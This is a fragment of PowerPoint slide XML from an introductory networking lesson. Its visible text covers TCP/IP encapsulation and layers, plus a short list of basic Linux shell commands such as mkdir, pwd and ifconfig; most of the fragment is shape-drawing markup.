                    <a:pt x="3741419" y="422452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3737738" y="440722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3727688" y="455642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3712755" y="465702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3694430" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46989" y="469392"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28664" y="465702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13731" y="455642"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3681" y="440722"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4693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0" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9CB0DEB-06FA-D7D6-806F-F1510508DEE6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6033274" y="4171862"/>
            <a:ext cx="8432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Physical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33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27E6B740-2BA6-1F55-B26F-667592DE3466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="528307" y="4836074"/>
            <a:ext cx="2121535" cy="1600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http://support.microsoft.com/kb/103884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2" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06156CFD-F861-3FAD-9009-B4D822B8489F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236223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23" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13543F89-96F1-181F-5E33-2C5FCE162E2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5236223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37</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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6B6C687-19AF-B821-5AF7-6BFFFD27B418}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4700520" y="1376280"/>
              <a:ext cx="10080" cy="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6B6C687-19AF-B821-5AF7-6BFFFD27B4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1160" y="1366920"/>
                <a:ext cx="28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A9911A-F9F2-4264-85EC-72980D0ECAF3}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1271520" y="290520"/>
              <a:ext cx="6058440" cy="388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A9911A-F9F2-4264-85EC-72980D0ECA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2160" y="281160"/>
                <a:ext cx="6077160" cy="39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144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3762BFA-FB0C-3146-B5AF-3F97BF76C82C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="435470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C2D076D-771D-7189-012B-7590B61637B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522896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5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Encapsulation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B6D7F86-FA86-33AC-5A8E-8EB1D1EB54FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5221973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F792AF3-0CA4-3617-F6EF-7324273B00D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5221973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38</a:t>
            </a:fld>
            <a:endParaRPr spc="-2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554743D-9CDC-52DD-DC91-D42609244154}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522287" y="1446594"/>
            <a:ext cx="8099425" cy="273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But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do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protocols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work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together?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If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every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a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header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payload,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6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lower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layer?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 dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="276225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idea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simple.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400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entire</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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upper</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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b="1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packet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(header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plus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payload)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payload</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1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lower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one;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this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called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encapsulation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 dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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E6DD56-0A86-280C-9455-2E561CA2ABA9}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3419640" y="1386000"/>
              <a:ext cx="2005200" cy="48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E6DD56-0A86-280C-9455-2E561CA2AB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0280" y="1376640"/>
                <a:ext cx="2023920" cy="5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70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44F0373-D18F-F47B-E3CF-EAD24A14F028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E768314-A832-1302-B55A-3F99D8D21BFE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5 </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Encapsulation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B5DEEFC-6627-F01B-2B46-25071C5B0BF1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FE1230B-7410-2161-9200-4142F522E0A4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39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D548109-1BE5-6C56-2BAA-E749162E54DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1813041"/>
            <a:ext cx="7628890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following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slides,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encapsulation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is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IP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suite,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TCP/IP.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Roboto"/>
              <a:cs typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="285115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TCP/IP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real-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world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implementation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-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networking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stack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stack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Internet.</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Roboto"/>
              <a:cs typeface="Robot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A08AB6-C519-ED09-46FE-0E4F0D3718A6}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4753080" y="2133720"/>
              <a:ext cx="1310040" cy="452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A08AB6-C519-ED09-46FE-0E4F0D3718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3720" y="2124360"/>
                <a:ext cx="1328760" cy="4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86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object 2"/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36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37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4</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 3"/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3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40" name="object 3"/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41" name="object 4"/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"/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44" name="object 7"/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45" name="object 9"/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46" name="object 10"/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4</a:t>
            </a:fld>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600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1.2 All Kali Linux commands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48" name="Text Box 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485140" y="1706880"/>
            <a:ext cx="2515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  <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  -mkdir file name new      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200400" y="219075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0" name="Text Box 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5181600" y="1951990"/>
            <a:ext cx="2160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new folder  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Text Box 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="233045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-pwd     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105660" y="257175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3" name="Text Box 52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="2419350"/>
            <a:ext cx="3067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/>
              <a:t>Show the path you are on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Text Box 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="272415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/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>ifconfig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    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105660" y="292989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6" name="Text Box 55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="2800350"/>
            <a:ext cx="3113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/>
              <a:t>View network information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1794CF7-2E11-9E41-DAB6-547603FF774E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847D073-5508-E3D6-C167-328EDE9FE738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5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Encapsulation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0550E15-FCD6-5810-3F96-765C9DE338FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="1454900"/>
            <a:ext cx="3150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TCP/IP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four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layers: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4F21307-07FE-A628-4F2F-116B1A606423}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="532422" y="3650045"/>
            <a:ext cx="76269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learn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TCP/IP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works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remainder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this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module.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E0418F69-23B0-DEAC-6FDE-BB1BEB84622C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="665060" y="2269352"/>
            <a:ext cx="1522730" cy="913130"/>
            <a:chOff x="543305" y="2268474"/>
            <a:chExt cx="1522730" cy="913130"/>
          </a:xfrm>
        </p:grpSpPr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AA70B437-71E5-155B-645B-18231DFEE729}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="543305" y="2268474"/>
              <a:ext cx="1522730" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1522730" h="913130">
                  <a:moveTo>
                    <a:pt x="1431163" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="91287" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55753" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26736" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7173" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7173" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26736" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55753" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91287" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431163" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466701" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495726" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515298" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522476" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522476" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515298" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495726" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466701" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143116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B1B0AB43-A92A-B892-8E85-87F817AF8C25}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="543305" y="2268474"/>
              <a:ext cx="1522730" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1522730" h="913130">
                  <a:moveTo>
                    <a:pt x="0" y="91312"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7173" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26736" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55753" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91287" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431163" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466701" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495726" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515298" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522476" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1522476" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1515298" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495726" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1466701" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1431163" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91287" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55753" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26736" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7173" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91312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F27FA4DD-45B4-D7AE-BFED-D5F027F069B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="773518" y="2512556"/>
            <a:ext cx="13036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3725671D-1D7B-57AE-C9E9-576A2E792230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2795613" y="2269352"/>
            <a:ext cx="1521460" cy="913130"/>
            <a:chOff x="2673858" y="2268474"/>
            <a:chExt cx="1521460" cy="913130"/>
          </a:xfrm>
        </p:grpSpPr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D177BD19-369D-CF8B-9C6B-3C5337026B1B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673858" y="2268474"/>
              <a:ext cx="1521460" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1521460" h="913130">
                  <a:moveTo>
                    <a:pt x="1429639" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="91312" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7177" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7177" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91312" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429639" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465177" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494202" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513774" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520952" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520952" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513774" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494202" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465177" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429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5F874062-68FF-AF35-0043-C42611959106}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2673858" y="2268474"/>
              <a:ext cx="1521460" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1521460" h="913130">
                  <a:moveTo>
                    <a:pt x="0" y="91312"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7177" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91312" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429639" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465177" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494202" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513774" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520952" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520952" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513774" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494202" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465177" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429639" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91312" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7177" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91312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1" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD55A2E0-6713-4AE8-D2C9-2AE9275501C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2999828" y="2512556"/>
            <a:ext cx="11112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2" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE22B2E-313D-C4AE-9702-7B695AD3EE6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4926164" y="2269352"/>
            <a:ext cx="1521460" cy="913130"/>
            <a:chOff x="4804409" y="2268474"/>
            <a:chExt cx="1521460" cy="913130"/>
          </a:xfrm>
        </p:grpSpPr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74473A00-0F92-B732-F323-07E005D6B124}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4804409" y="2268474"/>
              <a:ext cx="1521460" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1521460" h="913130">
                  <a:moveTo>
                    <a:pt x="1429639" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="91312" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7177" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7177" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91312" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429639" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465177" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494202" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513774" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520952" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520952" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513774" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494202" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465177" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429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CFDF1049-89D4-7A68-5A2B-C12EDAE8C69B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4804409" y="2268474"/>
              <a:ext cx="1521460" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1521460" h="913130">
                  <a:moveTo>
                    <a:pt x="0" y="91312"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7177" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91312" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429639" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465177" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494202" y="26749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513774" y="55774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520952" y="91312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1520952" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1513774" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1494202" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1465177" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1429639" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91312" y="912876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="905698"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26749" y="886126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7177" y="857101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="821563"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="91312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3" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{893FC9CE-979E-6ED4-8196-A080C3E2B115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5183720" y="2512556"/>
            <a:ext cx="10039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4" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3F32481-2155-5CE0-4505-03E9411BEE90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7055192" y="2269352"/>
            <a:ext cx="1522730" cy="913130"/>
            <a:chOff x="6933437" y="2268474"/>
            <a:chExt cx="1522730" cy="913130"/>
          </a:xfrm>
        </p:grpSpPr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0D8AEB07-B60D-ACD3-9471-7706CD3E9BAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6933437" y="2268474"/>
              <a:ext cx="1522730" cy="913130"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1522729" h="913130">
                  <a:moveTo>
                    <a:pt x="1431162" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="91312" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55774" y="7177"/>
                  </a:lnTo>
                  <a:lnTo>
